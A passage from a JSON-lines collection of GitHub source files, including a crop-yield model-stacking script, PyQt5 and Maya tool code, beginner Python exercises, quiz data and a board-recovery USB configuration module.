LinearRegression()\nstck_reg2.fit(x_stacked2, y_stacked2)\nstck_reg_preds_test2 = 
stck_reg2.predict(testPreds2)\nstck_reg_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_reg_preds_test2)\nstck_reg_rmse_test2 = np.sqrt(stck_reg_mse_test2)\npd.DataFrame(stck_reg_preds_test2).to_csv('stck_reg_preds_test_2018.csv')\nstck_reg_preds_train = stck_reg2.predict(x_stacked2)\npd.DataFrame(stck_reg_preds_train).to_csv('stck_reg_preds_train_2018.csv')\nstck_reg_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_reg_preds_train))\n\nstck_lasso2 = Lasso()\nstck_lasso2.fit(x_stacked2, y_stacked2)\nstck_lasso_preds_test2 = stck_lasso2.predict(testPreds2)\nstck_lasso_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_lasso_preds_test2)\nstck_lasso_rmse_test2 = np.sqrt(stck_lasso_mse_test2)\npd.DataFrame(stck_lasso_preds_test2).to_csv('stck_lasso_preds_test_2018.csv')\nstck_lasso_preds_train = stck_lasso2.predict(x_stacked2)\npd.DataFrame(stck_lasso_preds_train).to_csv('stck_lasso_preds_train_2018.csv')\nstck_lasso_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_lasso_preds_train))\n\nstck_rf2 = RandomForestRegressor()\nstck_rf2.fit(x_stacked2, y_stacked2)\nstck_rf_preds_test2 = stck_rf2.predict(testPreds2)\nstck_rf_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_rf_preds_test2)\nstck_rf_rmse_test2 = np.sqrt(stck_rf_mse_test2)\npd.DataFrame(stck_rf_preds_test2).to_csv('stck_rf_preds_test_2018.csv')\nstck_rf_preds_train = stck_rf2.predict(x_stacked2)\npd.DataFrame(stck_rf_preds_train).to_csv('stck_rf_preds_train_2018.csv')\nstck_rf_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_rf_preds_train))\n\nstck_lgb2 = LGBMRegressor()\nstck_lgb2.fit(x_stacked2, y_stacked2)\nstck_lgb_preds_test2 = stck_lgb2.predict(testPreds2)\nstck_lgb_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_lgb_preds_test2)\nstck_lgb_rmse_test2 = np.sqrt(stck_lgb_mse_test2)\npd.DataFrame(stck_lgb_preds_test2).to_csv('stck_lgb_preds_test_2018.csv')\nstck_lgb_preds_train = stck_lgb2.predict(x_stacked2)\npd.DataFrame(stck_lgb_preds_train).to_csv('stck_lgb_preds_train_2018.csv')\nstck_lgb_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_lgb_preds_train))\n\n\n\n## -------------------------- RESULTS -------------------------- ##\n\n\ntest_results = pd.DataFrame(data={'model':['RMSE'],'LASSO':[LASSO_rmse_test2], 'XGB':[XGB_rmse_test2], 'LGB':[LGB_rmse_test2],\n 'RF': [RF_rmse_test2], 'LR': [LR_rmse_test2],\n 'COWE': [cowe_rmse_test], 'Classical': [cls_rmse_test],\n 'stck_reg': [stck_reg_rmse_test2], 'stck_lasso': [stck_lasso_rmse_test2],\n 'stck_rf': [stck_rf_rmse_test2], 'stck_lgb': [stck_lgb_rmse_test2]})\n\ntrain_results = pd.DataFrame(data={'model':['RMSE'],'LASSO':[LASSO_rmse_train], 'XGB':[XGB_rmse_train], 'LGB':[LGB_rmse_train],\n 'RF': [RF_rmse_train], 'LR': [LR_rmse_train],\n 'COWE': [cowe_rmse_train], 'Classical': [cls_rmse_train],\n 'stck_reg': [stck_reg_rmse_train], 'stck_lasso': [stck_lasso_rmse_train],\n 'stck_rf': [stck_rf_rmse_train], 'stck_lgb': [stck_lgb_rmse_train]})\n\nCV_results = pd.DataFrame(data={'model':['RMSE'], 'LASSO':[np.sqrt(LASSO_mse2)], 'XGB':[np.sqrt(XGB_mse2)],\n 'LGB':[np.sqrt(LGB_mse2)], 'RF': [np.sqrt(RF_mse2)], 'LR': [np.sqrt(LR_mse2)],\n 'COWE': [cowe_rmse_CV],\n 
'Classical':[cls_rmse_CV]})\n\ntest_results.to_csv('2018_test.csv')\ntrain_results.to_csv('2018_train.csv')\nCV_results.to_csv('2018_CV.csv')\n","repo_name":"mohsenshahhosseini/Coupling-ML-with-Crop-Modeling","sub_path":"2018.py","file_name":"2018.py","file_ext":"py","file_size_in_byte":27304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21843902901","text":"# -*- coding: utf-8 -*-\n\n'''\n 【简介】\n 对话框关闭时返回值给主窗口例子\n'''\n\nimport sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom DateDialog2 import DateDialog\n\n\nclass WinForm(QWidget):\n def __init__(self, parent=None):\n super(WinForm, self).__init__(parent)\n self.resize(400, 90)\n self.setWindowTitle('信号与槽传递参数的示例')\n\n self.open_btn = QPushButton('获取时间')\n self.lineEdit_inner = QLineEdit(self)\n self.lineEdit_emit = QLineEdit(self)\n self.open_btn.clicked.connect(self.openDialog)\n\n self.lineEdit_inner.setText('接收子窗口内置信号的时间')\n self.lineEdit_emit.setText('接收子窗口自定义信号的时间')\n\n grid = QGridLayout()\n grid.addWidget(self.lineEdit_inner)\n grid.addWidget(self.lineEdit_emit)\n\n grid.addWidget(self.open_btn)\n self.setLayout(grid)\n\n def openDialog(self):\n dialog = DateDialog(self)\n '''连接子窗口的内置信号与主窗口的槽函数'''\n dialog.datetime_inner.dateTimeChanged.connect(self.deal_inner_slot)\n '''连接子窗口的自定义信号与主窗口的槽函数'''\n dialog.Signal_OneParameter.connect(self.deal_emit_slot)\n dialog.show()\n\n def deal_inner_slot(self, date):\n self.lineEdit_inner.setText(date.toString())\n\n\n def deal_emit_slot(self, dateStr):\n self.lineEdit_emit.setText(dateStr)\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n form = WinForm()\n form.show()\n sys.exit(app.exec_())\n","repo_name":"cxinping/PyQt5","sub_path":"Chapter07/transParam/CallDialogMainWin2.py","file_name":"CallDialogMainWin2.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":2140,"dataset":"github-code","pt":"16"} +{"seq_id":"14964349050","text":"#Q1\n#주어진 자연수가 홀수인지 짝수인지 판별해 주는 함수(is_odd)를 작성해 보자.\ndef Q1():\n a = input(\"정수를 입력하세요\\n:\")\n a = int(a)\n if a % 2 == 1:\n print(\"홀수 입니다.\")\n else:\n print(\"짝수입니다.\")\n\n\n#Q2\n#입력으로 들어오는 모든 수의 평균 값을 계산해 주는 함수를 작성해 보자. (단 입력으로 들어오는 수의 개수는 정해져 있지 않다.)\n#※ 평균 값을 구할 때 len 함수를 사용해 보자.\n\ndef q2_input(): #input을 받아 리스트 형태로 li에 저장\n li = []\n i = 1\n while i != 100:\n b = int(input(\"정수를 입력하세요. (0을 입력하면 입력이 종료 됩니다.):\"))\n if b == 0: #input이 0 이라면 종료\n break\n else: #input이 정수라면 li에 추가\n li.append(b)\n return li\n\ndef q2_calculate(li): #리스트 li를 매개변수로 받아옴\n total = 0\n for c in li: #리스트의 원자를 하나씩 추출하여 total에 저장\n total = c + total\n avg = total / len(li)\n print(\"총 합은 :\\n\", total)\n print(\"평균은 :\")\n return avg\n\ndef Q2():\n li = q2_input()\n result = q2_calculate(li)\n print(result)\n return result\n\n#Q3\n#다음은 두 개의 숫자를 입력받아 더하여 돌려주는 프로그램이다.#이 프로그램을 수행해 보자.\n#첫번째 숫자를 입력하세요:3\n#두번째 숫자를 입력하세요:6\n#두 수의 합은 36 입니다\n#3과 6을 입력했을 때 9가 아닌 36이라는 결괏값을 돌려주었다. 
이 프로그램의 오류를 수정해 보자.\n#※ int 함수를 사용해 보자.\ndef Q3():\n input1 = int(input(\"첫번째 숫자를 입력하세요:\"))\n input2 = int(input(\"두번째 숫자를 입력하세요:\"))\n total = input1 + input2\n print(\"두 수의 합은 %s 입니다\" % total)\n\n#Q4\n#다음 중 출력 결과가 다른 것 한 개를 골라 보자.\n#답 3번\ndef Q4():\n print(\"you\" \"need\" \"python\") #youneedpython\n print(\"you\"+\"need\"+\"python\") #youneedpython\n print(\"you\", \"need\", \"python\") #you need python\n print(\"\".join([\"you\", \"need\", \"python\"])) #youneedpython\n\n#Q5\n#다음은 \"test.txt\"라는 파일에 \"Life is too short\" 문자열을 저장한 후 다시 그 파일을 읽어서 출력하는 프로그램이다.\n#이 프로그램은 우리가 예상한 \"Life is too short\"라는 문장을 출력하지 않는다. 우리가 예상한 값을 출력할 수 있도록 프로그램을 수정해 보자.\n\n#답 : f1을 열어주고 닫는 구문이 없었음\ndef Q5():\n f1 = open(\"test.txt\", 'w')\n f1.write(\"Life is too short\")\n f1.close() #답 : 이 행을 추가\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n\n\n\n#Q6\n#사용자의 입력을 파일(test.txt)에 저장하는 프로그램을 작성해 보자. (단 프로그램을 다시 실행하더라도 기존에 작성한 내용을 유지하고 새로 입력한 내용을 추가해야 한다.)\ndef Q6():\n while True:\n a = input(\"텍스트 작성 : \")\n if a == '':\n print(\"종료\")\n break\n f1 = open(\"test.txt\", 'a')\n f1.write(a+\"\\n\")\n f1.close() #답 : 이 행을 추가\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n\n\n#Q7\n#다음과 같은 내용을 지닌 파일 test.txt가 있다. 이 파일의 내용 중 \"java\"라는 문자열을 \"python\"으로 바꾸어서 저장해 보자.\n#※ replace 함수를 사용해 보자.\n#Life is too short\n#you need java\ndef Q7():\n f = open('test.txt', 'r') #파일을 먼저 읽어 옴\n body = f.read() #읽어 온 파일을 body에 저장\n f.close()\n\n body = body.replace('java', 'python') #body값을 replace 함수로 값을 변경\n f = open('test.txt', 'w')\n f.write(body)\n f.close()\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n","repo_name":"Choijonghun/jhchoi_gitTest","sub_path":"4강_연습문제/Question.py","file_name":"Question.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1641475849","text":"try:\n numero = int(input(\"Ingresa un número entero y positivo: \"))\nexcept:\n print(\"Número introducido inválido.\")\n exit()\n\ni = 0\n\nif numero <= 0:\n print(\"Número no válido\")\n exit()\n\nprint(\"--La tabla del {}--\".format(numero))\nwhile i < 10:\n i += 1\n print(\" {} * {} = {}\".format(numero , i , numero * i))","repo_name":"Adolfo-Cuevas28/Python_Adolf","sub_path":"11. 
Bucles/Ejercicio1While.py","file_name":"Ejercicio1While.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30846784241","text":"from __future__ import division\nfrom jinja2.runtime import LoopContext, TemplateReference, Macro, Markup, TemplateRuntimeError, missing, concat, escape, markup_join, unicode_join, to_string, identity, TemplateNotFound\ndef run(environment):\n name = 'source/snippets/grids/landing.js'\n\n def root(context, environment=environment):\n if 0: yield None\n yield u\"\\njsonData = null\\n\\nfunction spiPreProcess(data)\\n{\\n\\tjsonData = data\\n\\n\\trecords = []\\n\\tfor (index in data.response.records)\\n\\t{\\n\\t\\trecords.push({'cell':[data.response.records[index].properties.title]});\\n\\t}\\n\\t\\n\\treturn {'total':records.length, 'page':1, 'rows':records};\\n}\"\n\n blocks = {}\n debug_info = ''\n return locals()","repo_name":"sgammon/StonerHub","sub_path":"templates/compiled/snippets/grids/landing.py","file_name":"landing.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17382909216","text":"import classes\n\nquestions_text = [\n \"Which is the largest country in the world?\",\n \"How many days are there in a leap year?\",\n \"Which one of these four birds has the longest beak and feet?\",\n \"What is the national currency of the United States of America (USA)?\",\n \"Guido van Rossum in 1991 designed which language?\",\n \"Finish the sequence: 9, 18, 27, _?\",\n \"Which one is the first fully supported 64-bit operating system?\",\n \"Which animal is called the king of the jungle?\",\n \"what time corresponds to 23:23 hours ?\",\n \"Which team has won most number of IPL matches ?\",\n \"Which is the largest planet in our Solar system?\",\n \"How many continents are there in the world?\",\n \"How many years are there in one Millenium?\",\n \"ipad is manufactured by?\",\n \"Who founded Microsoft?\",\n]\n\nfirst_option = [\n \"India\",\n \"354\",\n \"Heron\",\n \"Euro\",\n \"Javascript\",\n \"36\",\n \"Windows 7\",\n \"Elephant\",\n \"11:23PM\",\n \"KKR\",\n \"Earth\",\n \"8\",\n \"100 years\",\n \"Google\",\n \"Monty Ritz\",\n]\n\nsecond_option = [\n \"USA\",\n \"366\",\n \"Parrot\",\n \"Peso \",\n \"Python\",\n \"34\",\n \"Linux\",\n \"Lion\",\n \"11.11PM\",\n \"CSK\",\n \"Uranus\",\n \"5\",\n \"50 years\",\n \"Microsoft\",\n \"Danis Lio\",\n]\n\nthird_option = [\n \"China\",\n \"365\",\n \"Crow\",\n \"Dollar\",\n \"Java\",\n \"30\",\n \"Mac\",\n \"Tiger\",\n \"7:23PM\",\n \"MI\",\n \"Mars\",\n \"7\",\n \"500 years\",\n \"Amazon\",\n \"Bill Gates\",\n]\n\nfourth_option = [\n \"Russia\",\n \"420\",\n \"Pigeon\",\n \"Yen\",\n \"C++\",\n \"37\",\n \"Windows XP\",\n \"Cow\",\n \"9.11PM\",\n \"RCB\",\n \"Jupiter\",\n \"6\",\n \"1000 years\",\n \"Apple\",\n \"Jeff Bezos\",\n]\n\ncorrect_answers = [\n \"Russia\",\n \"366\",\n \"Heron\",\n \"Dollar\",\n \"Python\",\n \"36\",\n \"Linux\",\n \"Lion\",\n \"7:23PM\",\n \"MI\",\n \"Jupiter\",\n \"7\",\n \"1000 years\",\n \"Apple\",\n \"Bill Gates\",\n]\n\nquestions = []\n\nfor i in range(len(questions_text)):\n questions.append(\n classes.Question(\n questions_text[i],\n first_option[i],\n second_option[i],\n third_option[i],\n fourth_option[i],\n correct_answers[i],\n )\n )\n","repo_name":"Mannatpreet22/trivia-quiz","sub_path":"KBC Quiz 
Game/kbc_data.py","file_name":"kbc_data.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71486519688","text":"# coding=utf-8\nimport os\nfrom imp import reload\n\nfrom animation import common\nfrom pymel import core as pm\n\nreload(common)\n\n\nclass TransferAnimTool(common.Singleton):\n \"\"\"\n 动画传递工具\n\n 将旧版的表情动画传递到新版表情控制器面板上面的一次性工具\n\n \"\"\"\n\n def __init__(self):\n super(TransferAnimTool, self).__init__()\n\n self.template_path = \"\"\n self.namespace = \"\"\n\n self.initialize()\n self.show()\n\n def show(self):\n if pm.window(\"transferAnimTool\", ex=True):\n pm.deleteUI(\"transferAnimTool\")\n pm.window(\n \"transferAnimTool\",\n title=u\"动画传递助手\",\n cc=lambda *args: self.close_main_window())\n form_layout = pm.formLayout()\n\n layout = pm.columnLayout(adj=1, rs=5)\n pm.textFieldButtonGrp(\n \"templateTextField\",\n label=u\"模板文件\",\n bl=u\"指定文件\",\n cw3=[70, 200, 100],\n adj=2,\n text=self.template_path,\n bc=lambda *args: self.load_template_file())\n pm.textFieldGrp(\n \"namespaceTextField\",\n label=\"Namespace:\",\n cw2=[70, 200],\n adj=2,\n text=self.namespace,\n cc=lambda *args: self.set_namespace())\n pm.button(label=u\"传递动画!\", c=lambda *args: self.transfer_anim())\n pm.setParent(\"..\")\n\n pm.formLayout(\n form_layout, edit=True,\n attachForm=[\n (layout, 'top', 10),\n (layout, 'left', 10),\n (layout, 'right', 10),\n (layout, 'bottom', 10),\n # (btn, 'left', 10),\n # (btn, 'right', 10),\n\n # (output_frame, 'left', 10),\n # (output_frame, 'right', 10),\n # (output_frame, 'bottom', 10),\n ],\n attachControl=[\n # (btn, 'top', 5, layout),\n # (output_frame, 'top', 5, btn),\n # (file_export_list_frame, 'bottom', 5, export_options_frame),\n # (export_options_frame, 'bottom', 5, execute_button),\n ])\n\n pm.showWindow(\"transferAnimTool\")\n\n def close_main_window(self):\n pm.optionVar(sv=('transferAnimToolTemplatePath', self.template_path))\n pm.optionVar(sv=('transferAnimToolNamespace', self.namespace))\n\n def initialize(self):\n \"\"\"\n 初始化数据\n\n 从MAYA的保存的属性数据里面获取一些值\n\n :return:\n \"\"\"\n if pm.optionVar(q='transferAnimToolTemplatePath'):\n self.template_path = pm.optionVar(\n q='transferAnimToolTemplatePath')\n\n if pm.optionVar(q='transferAnimToolNamespace'):\n self.namespace = pm.optionVar(\n q='transferAnimToolNamespace')\n\n def load_template_file(self):\n json_location = pm.fileDialog2(\n dialogStyle=2, fileMode=1, okc=u\"选择模板配置文件\")\n if json_location:\n pm.textFieldButtonGrp(\n 'templateTextField', e=True, text=json_location[0])\n self.template_path = json_location[0]\n return\n\n def set_namespace(self):\n self.namespace = pm.textFieldGrp(\n \"namespaceTextField\", q=True, text=True)\n\n def transfer_anim(self):\n dict_data = common.read_json(file_path=self.template_path)\n print(dict_data)\n # print self.namespace\n source_attrs = dict_data.keys()\n print(source_attrs)\n for source_attr in source_attrs:\n source_anim_curves = pm.PyNode(\n \"%s%s\" % (self.namespace, source_attr)).inputs()\n if len(source_anim_curves) > 0:\n target_anim_curve = source_anim_curves[0].controller_name()\n # print target_anim_curve\n # print source_attr.split(\".\")[0]\n # print dict_data[source_attr].split(\".\")[0]\n target_anim_curve = target_anim_curve.replace(\n source_attr.split(\".\")[0],\n dict_data[source_attr].split(\".\")[0])\n\n new_anim_curve = pm.duplicate(\n source_anim_curves[0],\n name=target_anim_curve)\n\n pm.connectAttr(\n \"%s.output\" % 
new_anim_curve[0],\n \"%s%s\" % (self.namespace, dict_data[source_attr]),\n f=True)\n\n print(\"Done!\")\n\n return\n\n\nclass TemplateBuilder(common.Singleton):\n \"\"\"\n 属性传递模板创建工具\n\n 传递属性工具依赖属性模板(JSON)文件,\n 这个模板文件里面包含数据来源(source)对象控制器的名字和属性,\n 接受数据的目标(target)对象控制器的名字和属性\n\n \"\"\"\n\n def __init__(self):\n super(TemplateBuilder, self).__init__()\n\n self.output_path = \"\"\n self.namespace = \"\"\n self.output_items = []\n\n self.initialize()\n self.show()\n\n def initialize(self):\n \"\"\"\n 初始化数据\n\n 从MAYA的保存的属性数据里面获取一些值\n\n :return:\n \"\"\"\n if pm.optionVar(q='transferOutputPath'):\n self.output_path = pm.optionVar(\n q='transferOutputPath')\n\n if pm.optionVar(q='transferNamespace'):\n self.namespace = pm.optionVar(\n q='transferNamespace')\n\n def show(self):\n if pm.window(\"templateBuilder\", ex=True):\n pm.deleteUI(\"templateBuilder\")\n pm.window(\n \"templateBuilder\",\n title=u\"模板创建助手\", cc=lambda *args: self.close_main_window())\n form_layout = pm.formLayout()\n\n mode_options_grp = self.mode_options_grp()\n\n layout = pm.rowColumnLayout(nc=2, w=520)\n self.source_attr_list_column()\n self.target_attr_list_column()\n pm.setParent(\"..\")\n\n btn = pm.button(\n label=u\"自动比对\", w=504,\n c=lambda *args: self.comparison_attrs())\n\n output_frame = self.template_item_list()\n\n pm.formLayout(\n form_layout, edit=True,\n attachForm=[\n (mode_options_grp, 'top', 10),\n (mode_options_grp, 'left', 10),\n (layout, 'left', 10),\n (btn, 'left', 10),\n (output_frame, 'left', 10),\n (output_frame, 'bottom', 10)],\n attachControl=[\n (layout, 'top', 5, mode_options_grp),\n (btn, 'top', 5, layout),\n (output_frame, 'top', 5, btn)])\n\n pm.showWindow(\"templateBuilder\")\n\n def template_item_list(self):\n frame_layout = pm.frameLayout(label=\"Output Frame\", mh=5, w=504)\n pm.textFieldGrp(\n \"namespaceField\",\n adj=2, label=\"Namespace:\",\n cw2=[80, 200],\n text=self.namespace,\n cc=lambda *args: self.set_namespace())\n pm.textFieldButtonGrp(\n \"outputPathField\",\n label=\"Output Path:\",\n bl=\"Set Path\",\n adj=2,\n text=self.output_path,\n cw3=[80, 200, 100],\n bc=lambda *args: self.set_output_location())\n pm.textScrollList(\"outputItemScrollList\", a=self.output_items)\n pm.popupMenu()\n pm.menuItem(\n label=u\"载入数据\", c=lambda *args: self.load_dict_data())\n pm.menuItem(\n label=u\"移除选择\", c=lambda *args: self.remove_selected_item())\n pm.menuItem(\n label=u\"移除所有\", c=lambda *args: self.remove_all_item())\n pm.button(label=\"Build\", c=lambda *args: self.write_output())\n pm.setParent(\"..\")\n return frame_layout\n\n def mode_options_grp(self):\n options_grp = pm.optionMenuGrp(\n label=u'模式', cw2=[24, 200], adj=2)\n pm.menuItem(label=u'属性——属性')\n pm.menuItem(label=u'属性——对象')\n return options_grp\n\n def target_attr_list_column(self):\n pm.columnLayout(adj=1, rs=5)\n pm.text(label=u\"Target Object:\",\n al=\"left\")\n pm.textField(\"targetObjectField\", w=250)\n pm.textScrollList(\n \"targetObjectAttrScrollList\",\n sc=lambda *args: self.print_selected_item(\n widget=\"targetObjectAttrScrollList\"),\n dcc=lambda *args: self.append_output_item())\n pm.button(\n \"loadTargetBtn\",\n label=u\"Load Object\",\n c=lambda *args: self.load_controller(\n widget=\"targetObjectField\",\n extra_widget=\"targetObjectAttrScrollList\"))\n pm.setParent(\"..\")\n\n def source_attr_list_column(self):\n pm.columnLayout(adj=1, rs=5)\n pm.text(label=u\"Source Object:\",\n al=\"left\")\n pm.textField(\"sourceObjectField\", w=250)\n pm.textScrollList(\n \"sourceObjectAttrScrollList\",\n 
sc=lambda *args: self.print_selected_item(\n widget=\"sourceObjectAttrScrollList\"))\n pm.button(\n \"loadSourceBtn\",\n label=u\"Load Object\",\n c=lambda *args: self.load_controller(\n widget=\"sourceObjectField\",\n extra_widget=\"sourceObjectAttrScrollList\"))\n pm.setParent(\"..\")\n\n @staticmethod\n def remove_selected_item():\n selected_item = pm.textScrollList('outputItemScrollList', q=True,\n si=True)\n for item in selected_item:\n pm.textScrollList('outputItemScrollList', e=True, ri=item)\n # self.output_files = pm.textScrollList(\n # 'outputItemScrollList', q=True, ai=True)\n\n @staticmethod\n def remove_all_item():\n pm.textScrollList('outputItemScrollList', e=True, ra=True)\n # self.output_files = pm.textScrollList(\n # 'outputItemScrollList', q=True, ai=True)\n\n @staticmethod\n def load_controller(widget=None, extra_widget=None):\n controller = pm.ls(sl=True)\n if len(controller) > 1 or len(controller) < 1:\n pm.error(u\"请选择单个控制器\")\n else:\n pm.textField(widget, e=True, text=controller[0])\n\n attr_list = pm.listAttr(controller[0], k=True)\n pm.textScrollList(extra_widget, e=True, ra=True)\n pm.textScrollList(extra_widget, e=True, a=attr_list)\n\n @staticmethod\n def append_output_item():\n # todo: bug fix - 属性应该是一对一,当前是一对多,后续版本应该强制验证\n\n namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n source_controller = pm.textField(\n \"sourceObjectField\", q=True, text=True)\n if namespace in source_controller:\n source_controller = source_controller.split(\":\")[1]\n key = \"%s.%s\" % (\n source_controller,\n pm.textScrollList(\n \"sourceObjectAttrScrollList\", q=True, si=True)[0]\n )\n\n target_controller = pm.textField(\n \"targetObjectField\", q=True, text=True)\n if namespace in target_controller:\n target_controller = target_controller.split(\":\")[1]\n value = \"%s.%s\" % (\n target_controller,\n pm.textScrollList(\n \"targetObjectAttrScrollList\", q=True, si=True)[0]\n )\n\n item = \"%s:%s\" % (key, value)\n print(item)\n\n current_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n if item not in current_items:\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item)\n\n print(\"--------------\")\n\n def set_namespace(self):\n self.namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n def set_output_location(self):\n output_path = pm.fileDialog2(\n dialogStyle=2,\n fileFilter=\"JSON File (*.json);;\",\n fileMode=0, okc=u\"保存文件\")\n if output_path:\n pm.textFieldButtonGrp(\n \"outputPathField\", e=True,\n text=output_path[0])\n self.output_path = output_path[0]\n return\n\n def close_main_window(self):\n pm.optionVar(sv=('transferOutputPath', self.output_path))\n pm.optionVar(sv=('transferNamespace', self.namespace))\n\n def write_output(self):\n output_map = {}\n\n output_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n for output_item in output_items:\n key, value = output_item.split(\":\")\n print(key, value)\n output_map[key] = value\n\n common.write_json(dict_data=output_map, file_path=self.output_path)\n\n print(\"Done!\")\n\n def load_dict_data(self):\n item_list = []\n if os.path.isfile(self.output_path):\n dict_data = common.read_json(file_path=self.output_path)\n for item_key in dict_data.keys():\n item_list.append(\"%s%s:%s%s\" % (\n self.namespace,\n item_key,\n self.namespace,\n dict_data[item_key]))\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item_list)\n\n @staticmethod\n def print_selected_item(widget=None):\n print(pm.textScrollList(widget, q=True, 
si=True))\n\n @staticmethod\n def comparison_attrs():\n source_attrs = pm.textScrollList(\n \"sourceObjectAttrScrollList\", q=True, ai=True)\n target_attrs = pm.textScrollList(\n \"targetObjectAttrScrollList\", q=True, ai=True)\n\n comparison_attrs = list(\n set(source_attrs).intersection(set(target_attrs)))\n print(comparison_attrs)\n\n current_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n\n namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n source_controller = pm.textField(\n \"sourceObjectField\", q=True, text=True)\n if namespace in source_controller:\n source_controller = source_controller.split(\":\")[1]\n\n target_controller = pm.textField(\n \"targetObjectField\", q=True, text=True)\n if namespace in target_controller:\n target_controller = target_controller.split(\":\")[1]\n\n for attr in comparison_attrs:\n key = \"%s.%s\" % (source_controller, attr)\n value = \"%s.%s\" % (target_controller, attr)\n item = \"%s:%s\" % (key, value)\n if item not in current_items:\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item)\n","repo_name":"jzboylxj/XDLibs","sub_path":"animation/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":14613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"20281370678","text":"import yaml\nfrom snagrecover.utils import cli_error,parse_usb\nimport logging\nlogger = logging.getLogger(\"snagrecover\")\nimport os\n\ndefault_usb_ids = {\n\t# default ROM code USB IDs\n\t\"stm32mp1\": (0x0483,0xdf11),\n\t\"sama5\": (0x03eb,0x6124),\n\t\"sunxi\": (0x1f3a,0xefe8),\n\t\"am62x\": (0x0451,0x6165),\n\t\"imx\": {\n\t\t\"imx8qxp\": (0x1fc9,0x012f),\n\t\t\"imx8qm\": (0x1fc9,0x0129),\n\t\t\"imx8dxl\": (0x1fc9,0x0147),\n\t\t\"imx28\": (0x15a2,0x004f),\n\t\t\"imx815\": (0x1fc9,0x013e),\n\t\t\"imx865\": (\"SDPS\",0x1fc9),\n\t\t\"imx93\": (0x1fc9,0x014e),\n\t\t\"imx7d\": (0x15a2,0x0076),\n\t\t\"imx6q\": (0x15a2,0x0054),\n\t\t\"imx6d\": (0x15a2,0x0061),\n\t\t\"imx6sl\": (0x15a2,0x0063),\n\t\t\"imx6sx\": (0x15a2,0x0071),\n\t\t\"imx6ul\": (0x15a2,0x007d),\n\t\t\"imx6ull\": (0x15a2,0x0080),\n\t\t\"imx6sll\": (0x1fc9,0x0128),\n\t\t\"imx7ulp\": (0x1fc9,0x0126),\n\t\t\"imxrt106x\": (0x1fc9,0x0135),\n\t\t\"imx8mm\": (0x1fc9,0x0134),\n\t\t\"imx8mq\": (0x1fc9,0x012b),\n\t\t\"imx53\" : (0x15a2,0x004e),\n\t}\n}\n\nrecovery_config = {} # Global immutable config to be initialized with CLI args\n\ndef get_family(soc_model: str) -> str:\n with open(os.path.dirname(__file__) + \"/supported_socs.yaml\", \"r\") as file:\n socs = yaml.safe_load(file)\n family = {**socs[\"tested\"], **socs[\"untested\"]}[soc_model][\"family\"]\n return family\n\ndef check_soc_model(soc_model: str):\n\twith open(os.path.dirname(__file__) + \"/supported_socs.yaml\", \"r\") as file:\n\t\tsocs = yaml.safe_load(file)\n\tif soc_model not in {**socs[\"tested\"], **socs[\"untested\"]}:\n\t\tcli_error(f\"unsupported soc model {soc_model}, supported socs: \\n\" + yaml.dump(socs))\n\treturn None\n\ndef init_config(args: list):\n\t# this is the only time that config.recovery_config should be modified!\n\t# get soc model\n\tsoc_model = args.soc\n\tcheck_soc_model(soc_model)\n\trecovery_config.update({\"soc_model\": soc_model})\n\tsoc_family = get_family(soc_model)\n\trecovery_config.update({\"soc_family\": soc_family})\n\tif soc_family != \"am335x\":\n\t\tif args.rom_usb is None:\n\t\t\tif soc_family == \"imx\":\n\t\t\t\trecovery_config[\"rom_usb\"] = 
default_usb_ids[\"imx\"][soc_model]\n\t\t\telse:\n\t\t\t\trecovery_config[\"rom_usb\"] = default_usb_ids[soc_family]\n\t\telse:\n\t\t\trecovery_config[\"rom_usb\"] = parse_usb(args.rom_usb)\n\n\tfw_configs = {}\n\tif args.firmware:\n\t\tfor fw in args.firmware:\n\t\t\tif not isinstance(fw, dict):\n\t\t\t\tcli_error(\"firmware config to CLI did not evaluate to Python3 dict: {fw}\")\n\t\t\tfw_configs = {**fw_configs, **fw}\n\t\trecovery_config[\"firmware\"] = fw_configs\n\t\tif args.firmware_file:\n\t\t\tprint(\"Warning: You passed firmware configuration via files AND direct CLI arguments.\")\n\tif args.firmware_file:\n\t\t# get firmware configs\n\t\tfor path in args.firmware_file:\n\t\t\twith open(path, \"r\") as file:\n\t\t\t\tfw_configs = {**fw_configs, **yaml.safe_load(file)}\n\t\tif not isinstance(fw_configs, dict):\n\t\t\tcli_error(f\"firmware config passed to CLI did not evaluate to dict: {fw_configs}\")\n\t\trecovery_config[\"firmware\"] = 